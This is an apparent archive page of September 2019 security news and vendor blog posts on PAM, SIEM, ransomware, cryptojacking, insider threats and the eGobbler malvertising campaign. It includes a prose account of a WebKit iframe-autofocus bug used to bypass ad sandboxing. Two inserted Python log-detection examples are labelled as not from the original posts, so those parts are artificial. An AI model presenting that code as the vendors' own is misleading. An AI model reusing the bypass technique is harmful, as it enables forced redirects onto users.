Monthly Archives: September 2019

Managing and monitoring privileged access to cloud ecosystems

Cloud data breaches are on the rise, demonstrating time and again the need for a different approach and strategy to managing and monitoring privileged access to cloud ecosystems. Privileged access management (PAM) should be risk-aware and intelligent; reduce the sprawl of infrastructure, accounts, access and credentials; use continuous identity analytics; and provide just-in-time management of privileged accounts. According to Gartner’s 2018 Magic Quadrant for PAM report, by 2022 more than 50% of organizations with PAM … More

The post Managing and monitoring privileged access to cloud ecosystems appeared first on Help Net Security.

Five questions every CEO should be asking about cybersecurity


As the captain of the ship, the Chief Executive Officer (CEO) plays a very important role in how an enterprise addresses cybersecurity issues and concerns. When the CEO buys in to strengthening enterprise security, that commitment trickles down as a new mindset for the entire organization.

The 9th Annual Cost of Cybercrime Study 2019 revealed a significant statistic – the average cost of cybercrime for an organization increased by $1.4 million to $13 million in 2019.

This single statistic illustrates why cybersecurity is one of the most important issues a modern organization must deal with. It is no longer just a question for IT or Information Security; it is a business issue as important as any other that leaders need to address urgently.

But to create that mindset, what kind of questions should a CEO be asking? Here are five important ones:

  1. How prepared is the enterprise right now to handle cyber risks?

The CEO, as the most senior leader in the company, must know in detail how prepared the company is for current threats. Leadership needs visibility of how the enterprise is dealing with these risks, what measures are in place and which threats are slipping through the net. This question is the starting point: the answer gives a clear picture of where the enterprise currently stands on cybersecurity, and plans for the future can be built on it.

  2. Does the senior leadership buy into the current cybersecurity framework? If not, why?

CEOs head organizations but they can never be a one-person army. Great organizations surround CEOs with a team of competent leaders who come together to form one unified front. It is in the same way that a company’s senior leadership team comprising the C-suite must also showcase a united stand towards cybersecurity measures taken by the enterprise. This helps in better compliance and inculcation of a security-first mindset among employees. However, this is easier said than done and that is why a CEO must ask this question.

If the CEO finds out that this is not the case, the first step is to get the entire leadership team on board.

  3. What is our plan for responding to cybersecurity incidents? How regularly has it been tested?

No set of controls is perfect; there is always scope for malware to slip through despite the best possible measures. That is why an Incident Response Plan matters: it sets out the actions to be taken for different kinds of incident. The CEO must know the plan well, because in a crisis they will need to show that they are in control. CEOs must also keep abreast of how regularly the plan is tested, so that its shortcomings are known before an incident rather than discovered during one.

  4. Do the employees have a cybersecurity mindset?

Employees are the single biggest factor in cybersecurity preparedness for an enterprise. The CEO must be aware of the current culture of cybersecurity in the organization – are employees aware of the dangers that cyber threats may pose or do they still remain blissfully unaware? If the answer is the latter, the CEO must immediately put in place a plan to create a mindset of cybersecurity in the entire organization.

  5. How does the enterprise handle insider threats?

Cybersecurity is not always an external affair. In many cases the danger lurks inside the enterprise in the form of insider threats and disgruntled employees. It is not just the InfoSec team that has to be aware of this: the CEO must ask pointed questions about this type of threat and the measures the company is taking to tackle it.

Creating a cybersecurity culture in an enterprise is not easy but investing in a strong enterprise solution goes a long way in protecting an organization from the varied threats that exist. Seqrite’s range of solutions enables security and greater productivity in the cybersecurity journey.  

The post Five questions every CEO should be asking about cybersecurity appeared first on Seqrite Blog.

38% of the Fortune 500 do not have a CISO

To uncover whether the world’s leading companies are committed to enhancing their cybersecurity initiatives, Bitglass researched the members of the 2019 Fortune 500 and analyzed public-facing information such as what is available on their websites. 77% of the Fortune 500 make no indication on their websites about who is responsible for their security strategy. Additionally, 52% do not have any language on their websites about how they protect the data of customers and partners (beyond … More

The post 38% of the Fortune 500 do not have a CISO appeared first on Help Net Security.

Email is an open door for malicious actors looking to exploit businesses

Businesses face an alarming scale of risk at a time when email is proving an open door for cybercriminals and malicious actors looking to disrupt, exploit and destroy businesses, according to Wire. The report was developed in collaboration with global poker champion and astrophysicist Liv Boeree. Poker is a game of making calculated, strategic decisions in high-stakes situations, so Liv is able to draw parallels between the poker table and the … More

The post Email is an open door for malicious actors looking to exploit businesses appeared first on Help Net Security.

Employee negligence can be a leading contributor to data breaches

Two thirds (68%) of businesses reported that their organization has experienced at least one data breach in the past 12 months, and more than two thirds (69%) of those data breaches involved the loss or theft of paper documents or electronic devices containing sensitive information, according to the Shred-it report conducted by the Ponemon Institute. According to the report, typical workplace occurrences may be at the root of the problem, as 65% of managers are concerned … More

The post Employee negligence can be a leading contributor to data breaches appeared first on Help Net Security.

Tolly report: Evaluating the evolution of network traffic analysis technology

Network Traffic Analysis has been rapidly evolving to counter the increased sophistication of threats experienced by organizations worldwide. Test methodologies and tools are not yet available which provide security professionals with the ability to test how well the products currently on the market perform. Awake Security has partnered with the Tolly Group and a current Darktrace customer to develop and execute just such a test and has published a report detailing the methodology and the … More

The post Tolly report: Evaluating the evolution of network traffic analysis technology appeared first on Help Net Security.

Anomali Altitude automates detection, analysis, and threat response

Anomali, a leader in intelligence-driven cybersecurity solutions, unveiled the Anomali Altitude platform. The Anomali Altitude platform delivers Anomali Lens, Anomali ThreatStream, and Anomali Match. The integrated product suite allows customers to automate detection, analysis, and response for high-priority external and internal threats. Anomali Lens This first-of-its-kind technology allows anyone, from security operations staff to board members, to automatically and immediately know if their organizations are being attacked, who adversaries are, and if the attacks have … More

The post Anomali Altitude automates detection, analysis, and threat response appeared first on Help Net Security.

Cyber Threats to Medical Imaging Systems and How to Address Them

Healthcare continues to see staggering growth in breaches to patient health information. In the first half of 2019 alone, 32 million health records were breached, compared to 15 million records in the entire year of 2018. However, this trend of growing cyber breaches in healthcare is likely to persist due to the following characteristics of […]… Read More

The post Cyber Threats to Medical Imaging Systems and How to Address Them appeared first on The State of Security.

2019-129: File Disclosure Vulnerability in Pulse Connect Secure VPN Software

Overview The Australian Signals Directorate’s Australian Cyber Security Centre is aware of a vulnerability that exists in the Pulse Connect Secure Virtual Private Network (VPN) solution. We advise users to ensure their systems are patched and up to date. The Pulse VPN Vulnerability, also known as CVE-2019-11510, was initially disclosed in April 2019 but has resurfaced after multiple reports of exploitation and the disclosure of working exploits available for use on Pastebin and GitHub.

BlackBerry creates BlackBerry Advanced Technology Development Labs

BlackBerry announced the creation of BlackBerry Advanced Technology Development Labs (BlackBerry Labs), a new business unit operating at the forefront of research and development in the cybersecurity space. Led by CTO Charles Eagan, BlackBerry Labs will include a team of over 120 software developers, architects, researchers, product leads and security experts, each working toward the common goal of identifying, exploring and creating new technologies to ensure BlackBerry is on the cutting edge of security innovation. … More

The post BlackBerry creates BlackBerry Advanced Technology Development Labs appeared first on Help Net Security.

Red Hat shares rising interest for hybrid cloud in APAC

Red Hat, the world’s leading provider of open source solutions, shared that there is a rising interest for hybrid cloud in Asia Pacific (APAC), evident from the increasing number of cloud and managed services providers joining the Red Hat Certified Cloud and Service Providers program in Australia, China, India, Japan, Korea, Singapore, Thailand, The Philippines and Vietnam. The Red Hat Certified Cloud and Service Provider program includes more than 300 cloud, system integrator and managed … More

The post Red Hat shares rising interest for hybrid cloud in APAC appeared first on Help Net Security.

Loop1 Systems expands to the UK with the acquisition of Kenson

Loop1 Systems, an Austin-based enterprise IT service organization, proudly announces the acquisition of Kenson, one of the U.K.’s most respected suppliers of network management tools, expertise, and support. Kenson has served the market for more than 15 years and in 2017, the company received the SolarWinds Channel Renewal Partner of the Year Award. “The [Loop1] commitment to SolarWinds is steadfast and evident in the 10-year track record they have with SolarWinds,” said John Woolford, COO … More

The post Loop1 Systems expands to the UK with the acquisition of Kenson appeared first on Help Net Security.

Kenna Security raises $48M to accelerate its international expansion and drive further innovation

Kenna Security, the enterprise leader in risk-based vulnerability management, announced a $48 million series D funding round that adds Sorenson Capital and Citi Ventures as new investors. Ken Elefant, Managing Director of Sorenson Capital will join Kenna Security’s board of directors. The investment brings Kenna’s total raised to $98 million. “This round of funding demonstrates significant confidence in Kenna’s continued growth potential as the global market for risk-based vulnerability management expands,” said Karim Toubba, CEO … More

The post Kenna Security raises $48M to accelerate its international expansion and drive further innovation appeared first on Help Net Security.

Monitoring Application Security with SIEM


It always seems like the clichéd image of a security expert is someone sitting in a dark room with four to six bright monitors displaying different complex tasks. Regardless of how many monitors they use, we know security teams are using just as many, if not more, complex tools. According to analyst firm EMA’s Security Megatrend Report, 75% of respondents use more than six consoles to do their jobs. While the stereotypical cybersecurity expert at work may seem thrilling, the reality is that having so many tools to monitor is overwhelming, and keeping up with all of them is virtually impossible.

Security Information and Event Management (SIEM) solutions provide security staff relief and insights with a centralized analysis of security data pulled from a variety of systems. Read on to learn about the large variety of information a SIEM can consolidate, becoming your organization’s primary security monitoring tool.

Typical Information

Universally, SIEMs monitor standard datasources, which include operating systems like Windows and Linux, routers and switches, firewalls, databases, and servers. SIEMs monitor these assets not only for unusual behavior, but can also ensure that planned activities, like addition or deletion of users or data, occurred without incident. Having all of these sources monitored in one place also allows for event correlation. Event correlation shows how a single event can be related to other logged events, assisting in forensic analysis and providing an audit trail. This can provide powerful insights about your environment.  For example, if a user engages in unusual behavior on your server, you can bring up all activity from that user, capturing security events more quickly and seeing if there is a pattern on other devices, warranting suspicion.

Diverse Datastreams

While standard datasources are critical to monitor, each organization brings unique sources to the table that also need monitoring, like a homegrown database or third-party applications. Connecting things like a CRM streamlines your environment even further, reducing the number of consoles your security team has to look at.

This is particularly important for things like financial applications, where capturing events in real time can be especially crucial. For example, if a credentialed user was created, performed several actions, and was then deleted, this suspicious sequence can mean that both confidential data and money are at risk. Without a SIEM correlating the events and sending an alert in real time, this activity may not be spotted until it’s too late to do anything about it. Additionally, if an unauthorized user attempts or is able to download confidential data, a SIEM with a response integration into the identity system can disable that user’s access immediately, limiting further exposure while the event is investigated. The action taken depends on the event and can be configured to suit the needs of each organization.

Most importantly, feeding application-layer security events into the SIEM brings further insight into how events relate to each other. The more a SIEM monitors, the easier it is to find correlated events, providing a new angle from which to view your security picture. For example, integrating an antivirus solution not only gives you alerts about blocked infections, it also lets you isolate where the infection attempt originated, providing further insight.
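To make the correlation described above concrete, here is an added example (not code from the original post or from Powertech Event Manager) that normalises a handful of constructed key=value log lines from two sources, pivots on a single user across them, and flags an account that was created, used and deleted within a short window. The log format, field names, sample lines and the 30-minute window are all assumptions made for the demonstration.

```python
"""Correlate events from several sources to flag a short-lived account:
created, used, then deleted within a short window.

Added example, not code from the original post or from Powertech Event
Manager. The log format, field names and sample lines are constructed.
"""
from datetime import datetime, timedelta

# Constructed sample logs, already normalised to key=value pairs by a
# hypothetical collector. Two sources: a finance application and a Linux host.
SAMPLE_LOGS = """\
ts=2019-09-10T09:00:01 src=finapp event=user_create actor=admin.j target=tmp_payroll
ts=2019-09-10T09:00:45 src=finapp event=login user=tmp_payroll ip=10.0.5.17
ts=2019-09-10T09:02:10 src=finapp event=export user=tmp_payroll object=vendor_bank_details rows=1842
ts=2019-09-10T09:03:30 src=linux host=fin-db-01 event=ssh_login user=tmp_payroll ip=10.0.5.17
ts=2019-09-10T09:05:02 src=finapp event=user_delete actor=admin.j target=tmp_payroll
ts=2019-09-10T10:15:00 src=finapp event=user_create actor=hr.k target=new.hire
ts=2019-09-10T10:20:00 src=finapp event=login user=new.hire ip=10.0.8.3
"""


def parse(lines):
    """Turn key=value log lines into dicts, sorted by timestamp."""
    events = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        fields = dict(kv.split("=", 1) for kv in line.split())
        fields["ts"] = datetime.fromisoformat(fields["ts"])
        events.append(fields)
    return sorted(events, key=lambda e: e["ts"])


def activity_for(events, user):
    """Pivot: every event involving a user, across all sources and hosts."""
    return [e for e in events if user in (e.get("user"), e.get("target"))]


def short_lived_accounts(events, window=timedelta(minutes=30)):
    """Flag accounts created and deleted within `window` that did something
    in between. Returns {account: [events between create and delete]}."""
    created = {}   # account -> creation time, for accounts not yet deleted
    findings = {}
    for e in events:
        if e["event"] == "user_create":
            created[e["target"]] = e["ts"]
        elif e["event"] == "user_delete" and e["target"] in created:
            born = created.pop(e["target"])
            if e["ts"] - born <= window:
                acts = [a for a in activity_for(events, e["target"])
                        if born < a["ts"] < e["ts"]]
                if acts:
                    findings[e["target"]] = acts
    return findings


if __name__ == "__main__":
    evs = parse(SAMPLE_LOGS)
    for acct, acts in short_lived_accounts(evs).items():
        print(f"ALERT short-lived account {acct} was active before deletion:")
        for a in acts:
            print("   ", a["ts"].isoformat(), a["src"], a["event"])
```

The pivot in activity_for is what lets the rule see the SSH login on the database host alongside the application events: neither source on its own shows that a throwaway account exported vendor bank details and then reached the database before being removed.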

Expanding the SIEM Network

A SIEM is only as good as the data streams it can assess. As mentioned above, while there are typical sources that most environments have, many organizations have needs outside the normal scope. Simply put, a SIEM can’t generate alerts for an application it isn’t monitoring. A data source that is not fed into the SIEM requires separate attention, increasing not only your security team’s workload but also the likelihood of suspicious activity slipping through the cracks. The more sources you connect, the more insight you gain.

Powertech Event Manager provides a holistic view of your entire environment. It not only provides out-of-the-box-templates for easy implementation for standard datasources, it can also be used with in-house applications, third party software or connected devices, providing a full audit trail and real-time monitoring for non-mainstream applications that still provide access to your critical systems. Our experts will be readily available to work with your security team to develop a plan for connecting any necessary data streams and provide ongoing support.


What Tesla’s Cryptojack Attack Means for the Rest of Us


In February, Fortune, Wired, and other media outlets reported that hackers worked their way into automaker Tesla’s Amazon Web Services (AWS®) cloud account to mine for cryptocurrency. These so-called “cryptojacking” attacks are on the rise in concert with escalating cryptocurrency prices, prompting hackers to gain access to company networks to generate these virtual forms of tender. It’s yet another facet of cybersecurity to keep IT experts up at night, wondering who will be hit next.

Cryptocurrency…What Is That Again?

As a refresher, a cryptocurrency is a digital or virtual currency secured through cryptography, which makes it hard to counterfeit. Bitcoin is probably the most well-known example. Cryptocurrencies are decentralized, offer a degree of pseudonymity in transactions, and are lightly regulated in many jurisdictions. Because of this limited oversight, they are attractive for illegal activities such as tax evasion and money laundering. Cryptocurrencies make use of blockchain, a ledger technology for recording and verifying transactions in a way that is very hard to alter after the fact.

From Bad to Worse

Fortunately for Tesla, researchers from cybersecurity firm RedLock discovered the intrusion. However, the attack itself was possible because Tesla’s credentials were exposed on an administrative console that had no password protection. Said another way, Tesla forgot to lock the door. In addition to mining cryptocurrency, the attackers were able to access other sensitive information such as vehicle servicing and mapping data. The researchers couldn’t determine how long the hackers had access to Tesla’s account, or the amount of cryptocurrency they were able to mine, but they found evidence that the Stratum mining protocol had been used.

An Ounce of Prevention

Tesla acted quickly to secure its files, but the fact that this intrusion happened at all is a major red flag. Although cybersecurity threats are everywhere, and ingenious hackers seem to think up new ways to get into sensitive information every day, this is one of those cases where it was all too easy to commit a crime. Why? Because the information was essentially sitting out there for anyone to find and use for their own purposes.

Avoiding this type of scenario takes a proactive approach to your IT infrastructure. Powertech Security Auditor automatic cloud system discovery and auditing would have found additional AWS systems as they were deployed. In addition, Tesla administrators would have received alerts of those findings, thwarting this or any similar type of attack. The solution works by automatically applying security controls on the systems it discovers. It reports on any audits that fail to meet corporate standards. Incorrect configurations, unapproved users, and any non-approved running services would have been reported.

In concert with Security Auditor, Powertech Event Manager provides centralized logging and auditing of security alerts and events within IT environments. By normalizing the various data streams and prioritizing the criticality of security events, you can quickly and clearly identify security incidents and take appropriate action to resolve the issues and secure your environment.


Ransomware Hits the City of Atlanta


On March 22, the city of Atlanta was brought to its knees by a ransomware attack. CNN reported that the incident affected at least five of the city’s municipal departments, effectively locking down key functions for the police, courts, and more. The attackers demanded a ransom of about $51,000, payable in bitcoin. According to the Atlanta Journal-Constitution, the city had declined to say whether it had made this payment as of April 12, and the overall estimated cost of the incident was $2.7 million and climbing.

Not If, But When

In coverage of the incident, news sources indicated the city had known for years of its security vulnerabilities and lack of a solid approach to business continuity and disaster recovery planning. The reality of these concerns is now upon municipal employees and citizens as everyone struggles to complete everyday tasks without computer access. The fact that Atlanta had just begun to address the recommendations from its January cybersecurity audit is especially heartbreaking.

What Happened Behind the Scenes

The vulnerabilities in the city’s infrastructure were no match for the SamSam ransomware, whose operators pair it with tools such as Mimikatz to harvest credentials and take control of networks. In this way, SamSam can move through a network quickly without needing to propagate via employees’ email accounts, as some other ransomware does. SamSam operators also use tools including JexBoss to find and exploit unpatched servers running Red Hat® JBoss® software. Once inside, the attackers run scripts that cull credentials and other information. Finally, the ransomware encrypts files, and the attackers demand their payment.

It Could Have Been Prevented

Disruptive and costly ransomware attacks like what the city of Atlanta is experiencing are all too common. No doubt the cybersecurity issues the city was in the process of addressing would have included solutions such as those HelpSystems customers rely on every day.

Powertech Antivirus runs natively on Red Hat and other major Linux distributions to detect and clean ransomware and malware like SamSam and Mimikatz. HelpSystems risk assessment engagements do a full patch audit on your Linux systems and identify any missing updates which can leave your organization vulnerable to attack.

Powertech Security Auditor has a feature for automatically detecting unapproved system services. The solution discovers unwanted programs running in your environment and immediately terminates them, limiting the chance of damage and data leaks.

Powertech Event Manager provides centralized logging and auditing of the security alerts and events within your environment. By normalizing the various data streams and prioritizing the criticality of security events, you can quickly and clearly identify security incidents and take the appropriate steps to secure your environment and resolve the issue.


Cryptoviral Extortion: The Enduring Problem of Ransomware


In 1989, the first instance of ransomware was delivered to thousands of people on floppy disks and demanded that money be sent in the form of a cashier’s check or international money order to a P.O. box in Panama. These days, ransomware has become increasingly more streamlined. Just about anyone can purchase a ransomware strain off the dark web and deploy it without needing to be all that tech savvy. Additionally, using cryptocurrency like Bitcoin helps attackers stay anonymous and untraceable. Though modern ransomware is simple to use, its effects can be far reaching and long lasting. Read on to learn about the long arms of ransomware, and how to protect your organization from its grasp.

Ransomware can set you back decades

Attackers have found a particularly vulnerable victim in small towns and businesses, which often lack the financial resources it takes to recover from a ransomware attack. For example, the Alaskan borough of Matanuska-Susitna nearly had to shut down after a strain swept through their systems, affecting everyone from the purchasing department to the library. Those assets that were not infected were taken offline to prevent further spread. Staff were forced to return to the use of pen, paper, and typewriters for days. Though the attack took place in July 2018, the borough is still recovering.

While successful ransomware attacks don’t always completely cripple organizations, they almost always cause significant disruption. For example, last year’s attack on the city of Atlanta using the SamSam strain of ransomware cost millions, and also took months to get productivity back to normal levels.

Unfortunately, organizations remain far too overconfident in their ability to recover quickly. In a comprehensive survey of cybersecurity professionals conducted by Cybersecurity Insiders, 79% of respondents thought they could recover from an attack in less than a week. Though initial information about attacks is constantly in the news, more follow ups to demonstrate the long-lasting effects may still be needed.

Data backup plans may not be enough

Ransomware can be fast acting and incredibly thorough, as Apex Human Capital Management just discovered. Recently, a ransomware attack spread through their network. However, they had just completed an exhaustive recovery plan with an off-site system that mirrored their live system intended to protect them from exactly this type of situation. Regrettably, since the live-site had an ongoing connection to the backup site, the ransomware was quickly able to hold both sets of data hostage.

Sadly, the path to the retrieval of their data was not a smooth one. They paid the ransom but were given a decryption key that did not work as promised. The decryption process broke a number of directories and made some of the other files completely unopenable. In the end, they were left with a half recovered set of files.

In order to have a truly secure backup, it’s important to have a secondary system that is disconnected from the network when it isn’t backing up data. In fact, it’s best to have multiple backups in place, with at least one of them off-site.

Paying the ransom is no guarantee of recovery

Apex’s desire to simply get it over with and pay the ransom to quickly get data back and return to business as usual is an instinct everyone can sympathize with.  Regardless, experts almost universally advise not to pay the ransom. The fact is, you simply cannot trust that attackers will return your data once you’ve paid. Once you’ve paid, they have what they want, and face zero consequences for not holding up their end of the bargain. For example, XBash malware poses as ransomware, but is programmed merely to destroy Linux databases, and contains no restoration mechanism.  

Despite this, according to a survey by CyberEdge Group, 38.7% of organizations paid the ransom, and only half of these victims recovered their data. Of the 61.3% that did not pay the ransom, 53.3% were able to recover some of their data. It’s far better to invest the ransom payment into recovering the data through other means. Ultimately, paying ransom is bad for everyone. You’re unlikely to get your data back and giving into demands only encourages either a repeat attack, or further attacks on other organizations.

Preparedness and prevention

Realistic expectations, multiple backups, informed employees, and a policy to not pay ransoms are all necessary components to being prepared for a ransomware attack. However, the best way to prepare for ransomware attacks is to prevent them from succeeding in the first place.

Security Information and Event Management (SIEM) solutions provide centralized logging and auditing of the security alerts and events within your environment. SIEM software can help provide context to events and clearly identify security incidents, such as indicators of ransomware, in real time. This allows security teams to act on the alert and lock down systems before the infection spreads.

Implementing robust anti-malware with predictive analysis not only catches existing strains of malware, it can also detect new viruses before they become widespread. It’s also important that you don’t only have anti-malware for just workstations, but also provide protection for other endpoints like servers, preventing ransomware from entering elsewhere in your environment.

By taking a proactive approach to ransomware, organizations have a much better chance of never having to recover from it.


eGobbler Malvertiser Bypassed Browser Protections Using Obscure Bugs

A malvertising actor known as “eGobbler” used obscure browser bugs to bypass built-in browser protections and expand the scope of its attacks. Confiant observed eGobbler exploiting the first vulnerability back on April 11, 2019. In that particular attack, the threat actor leveraged a Chrome exploit to circumvent the browser’s pop-up blocker built into iOS devices. […]… Read More

The post eGobbler Malvertiser Bypassed Browser Protections Using Obscure Bugs appeared first on The State of Security.

eGobbler ‘s malvertising campaign hijacked over 1 billion ad impressions

A recently observed malvertising campaign carried out by a threat group dubbed eGobbler hijacked roughly 1.16 billion ad impressions.

Researchers at Confiant observed a malvertising campaign carried out by a threat actor dubbed eGobbler hijacked roughly 1.16 billion ad impressions to redirect victims to websites hosting malicious payloads.

The campaign was observed between August 1 and September 23.

The eGobbler group was first observed by security firm Confiant in April, when it was exploiting a security flaw in the Google Chrome browser to target millions of iOS users. At the time, Confiant experts estimated that more than 500 million malicious ads had been served to iOS users.

This time eGobbler hackers extended their attacks to Windows, Linux, and macOS desktop devices.

“Over the past 6 months, the threat group has leveraged obscure browser bugs in order to engineer bypasses for built-in browser mitigations against pop-ups and forced redirections.” reads the analysis published by Confiant.

“This blog post will provide overviews and proof of concepts for both browser exploits. The first exploit that we reported on April 11, 2019 impacts Chrome versions prior to 75 on iOS. The second, which we reported on Aug. 7 was fixed in iOS 13 / Safari 13.0.1 on Sept. 19, impacts WebKit based browsers.”

In the recent campaign, the attackers used an exploit that targets WebKit-based browsers; the researchers observed redirections on WebKit browsers upon the ‘onkeydown’ event.

“The nature of the bug is that a cross-origin nested iframe is able to “autofocus” which bypasses the “allow-top-navigation-by-user-activation” sandbox directive on the parent frame.” continues the analysis. “With the inner frame automatically focused, the keydown event becomes a user activated navigation event, which renders the ad sandboxing entirely useless as a measure for forced redirect mitigation.”

Experts also discovered that the payload used in this campaign had specifically targeted some web applications using text areas and search forms in order to maximize the chances of hijacking these keypresses.

“eGobbler’s preference for desktop platforms during this period supports their latest WebKit exploit, as the ‘onkeydown’ event is less likely to spawn organically during mobile browsing,” states Confiant.

Experts reported the bug to both the Chrome and Apple security teams; the latter answered within the hour, while the former responded on August 9 that they were investigating.

On August 12, the Chrome team provided an update that a patch had been submitted to WebKit on August 9.

Apple addressed the issue in iOS 13 on September 19 and in Safari 13.0.1 on September 24.

The analysis published by the experts includes Indicators of Compromise for the recent campaign, including a list of content delivery networks (CDNs) used by the eGobbler threat actor to deliver the malicious payloads.

Pierluigi Paganini

(SecurityAffairs – eGobbler, hacking)

The post eGobbler’s malvertising campaign hijacked over 1 billion ad impressions appeared first on Security Affairs.

Five Malicious Insider Threat Indicators and How to Mitigate the Risk


With the prevalence of cyber attacks from individuals and groups looking to exploit corporate vulnerabilities and sensitive information assets, companies sometimes overlook another common threat: their own employees. It’s incredibly disheartening to think of trusted current or former colleagues looking to exploit sensitive information for their own monetary gain, but it’s increasingly common. Luckily, there are some telltale signs of this malicious activity that can enable you to identify and rectify problems as quickly as possible using the strategies detailed below.

Indicators: Increasing Insider Threat Awareness

Keep an eye out for the following suspicious occurrences, and you’ll have a far better chance of thwarting a malicious insider threat, even if it’s disguised as an unintentional act.

1. Unusual logins

At many companies there is a distinct pattern to user logins that repeats day after day. Logins happening remotely, from unusual locations, or during odd hours could be a sign of trouble. Likewise, your authentication logs may start filling up with numerous unexplained occurrences of “test” or “admin” username attempts that fail to pass muster. Anything that strikes you as out of the ordinary warrants investigation.

2. Use or repeated attempted use of unauthorized applications

No doubt you maintain a dizzying number of mission-critical systems such as your CRM, financial management applications, ERP, and others, each of which should have a strictly defined set of users. If you’re structuring your access privileges properly, you’ll have particular people or roles that are granted access to necessary applications. When unauthorized people gain access to these applications and the sensitive data they house, it could mean a breach of disastrous proportions for your business. An increase in attempts to log in to these systems could be a red flag.

3. An increase in escalated privileges

Anyone with heightened system access is an inherent threat to your business simply because they are likely privy to sensitive information that should never fall into the wrong hands. Sometimes, a person with administrative rights (a trusted individual) will start granting privileges to others who shouldn’t have them. An increase in the number of people with this sort of escalated access could mean they’re wandering unencumbered around your servers, looking for just the right data to sell on the dark web. These insider threats could also be using these privileges to access unauthorized applications as mentioned above.

4. Excessive downloading of data

Your IT team probably has a good handle on your organization’s bandwidth usage and data downloading patterns when it comes to data accessed from your onsite network or cloud infrastructure and copied onto computers or external drives. Perhaps it’s normal for the sales team to download large marketing files or for HR to save large employee or payroll databases on a regular basis. But if you begin to see significant downloads of data that can’t be explained, or that occur during odd times of the day or from strange locations in which you don’t typically do business, something is likely amiss.

5. Unusual employee behavior

The behavior indicator is a good one, and it requires some intuition and a keen eye. If someone who is normally a high performer who gets along well with others starts to act differently, take notice. While it’s certainly possible there are extenuating personal circumstances behind the scenes, unexplained poor performance or disagreements with coworkers or superiors over policies could mean this person is someone to keep an extra close eye on for the foreseeable future. Particularly if he or she seems to indicate some sort of financial distress or unexplained financial gain—or resigns unexpectedly—they may have or be planning to make improper use of your corporate assets.
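As an added example (not code from the original post), the first three indicators above turned into a small detector run over constructed authentication log lines: off-hours or external logins, repeated failed ‘test’/‘admin’ attempts from one source, and privilege grants made outside the normal context. The log format, the 10.0.0.0/8 corporate range, the 07:00–19:59 business window and the failure threshold are all assumptions.

```python
import ipaddress
import re
from collections import Counter
from datetime import datetime

# Hypothetical line format: "<ISO timestamp> <user> <source IP> <OK|FAIL> <event> [detail]"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<user>\S+) (?P<src>\S+) (?P<result>OK|FAIL) (?P<event>\S+)(?: (?P<detail>.*))?$"
)
INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8")]  # assumed corporate address range
BUSINESS_HOURS = range(7, 20)                          # assumed 07:00-19:59 window
PROBE_USERS = {"test", "admin"}                         # usernames named in indicator 1
FAIL_THRESHOLD = 3                                      # assumed per-source threshold

# Constructed sample log: a normal day plus one odd account and one probing host.
SAMPLE_LOG = """\
2019-09-10T09:02:11 alice 10.0.1.15 OK login
2019-09-10T09:05:43 bob 10.0.1.22 OK login
2019-09-10T02:14:07 carol 203.0.113.9 OK login
2019-09-10T02:14:30 carol 203.0.113.9 OK grant role=db_admin to=dave
2019-09-10T11:20:01 admin 10.0.1.80 FAIL login
2019-09-10T11:20:03 admin 10.0.1.80 FAIL login
2019-09-10T11:20:06 test 10.0.1.80 FAIL login
2019-09-10T11:20:09 test 10.0.1.80 FAIL login
2019-09-10T14:00:00 bob 10.0.1.22 OK grant role=finance_reader to=erin
"""


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def is_internal(src):
    """True when the source address falls inside one of the assumed corporate ranges."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in INTERNAL_NETS)


def analyze(log_text):
    """Return a list of (indicator, subject, message) alerts for the given log text."""
    alerts = []
    probe_fails = Counter()  # failed test/admin attempts per source address
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        user, src, ts = rec["user"], rec["src"], rec["ts"]
        in_context = ts.hour in BUSINESS_HOURS and is_internal(src)
        # Indicator 1: successful logins at odd hours or from outside the network.
        if rec["event"] == "login" and rec["result"] == "OK":
            if ts.hour not in BUSINESS_HOURS:
                alerts.append(("unusual-login", user, f"off-hours login at {ts.isoformat()} from {src}"))
            if not is_internal(src):
                alerts.append(("unusual-login", user, f"login from external address {src}"))
        # Indicator 1: repeated failed 'test'/'admin' attempts from one source.
        if rec["event"] == "login" and rec["result"] == "FAIL" and user in PROBE_USERS:
            probe_fails[src] += 1
        # Indicator 3: privilege grants made outside the normal working context.
        if rec["event"] == "grant" and rec["result"] == "OK" and not in_context:
            alerts.append(("privilege-grant", user, f"privilege grant outside normal context: {rec['detail']}"))
    for src, n in probe_fails.items():
        if n >= FAIL_THRESHOLD:
            alerts.append(("credential-probing", src, f"{n} failed test/admin login attempts"))
    return alerts


if __name__ == "__main__":
    for indicator, subject, message in analyze(SAMPLE_LOG):
        print(f"[{indicator}] {subject}: {message}")
```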

Strategizing and Implementing an Insider Threat Program

The strategies and tools available to round out your insider threat program are becoming more sophisticated to keep up with—and often stay ahead of—cybercriminals out for financial gain or to cause destruction.

1. Make sense of event data with a SIEM solution

A security information and event management (SIEM) solution can become your eyes and ears by aggregating, normalizing, and interpreting the vast data feeds from your cybersecurity monitoring solutions. This can include changes to user profiles and system values, invalid login attempts, intrusion detections, and changed or deleted objects. It will spot abnormalities beyond the typical ‘noise’ happening within the data and send alerts to indicate issues. This enables your team to assess disturbances and act on them swiftly to minimize the potential impact.

2. Limit user access with a privileged access management (PAM) solution

It is well worth the effort to develop and implement a thorough approach to user privileges and access rights. Most employees only require access to a few key network locations and applications, and even these need to be curated by role and adjusted as job-specific requirements change. In general, users should only be able to access precisely what’s needed to perform their jobs on a daily basis (keeping in mind their productivity if workaround processes are cumbersome). Doing this effectively requires a privileged access management solution. This helps you assign the lowest level of privileges required to minimize exposure, more commonly known as the principle of least privilege.

3. Maintain vigilance

Malicious insider threats are an unfortunate reality today, and there’s no substitute for ongoing attention to what’s happening across your network. This means you need to check in on a consistent basis, track unusual behavior, and take comments and complaints about an employee’s unusual behavior seriously. Always remember that in addition to implementing the appropriate cybersecurity tools and procedures to help you keep up with your environment monitoring and bolster your security posture, your intuition is often a guide when something’s wrong.


BlackBerry launches BlackBerry Labs to develop cybersecurity solutions

BlackBerry Ltd. is looking to ramp up its cybersecurity research and development by today announcing the launch of a new business unit entitled BlackBerry Advanced Technology Development Labs (BlackBerry Labs).

The unit will be headed by BlackBerry’s chief technology officer, Charles Eagan, and will include a team of over 120 software developers, architects, researchers, product leads and security experts.

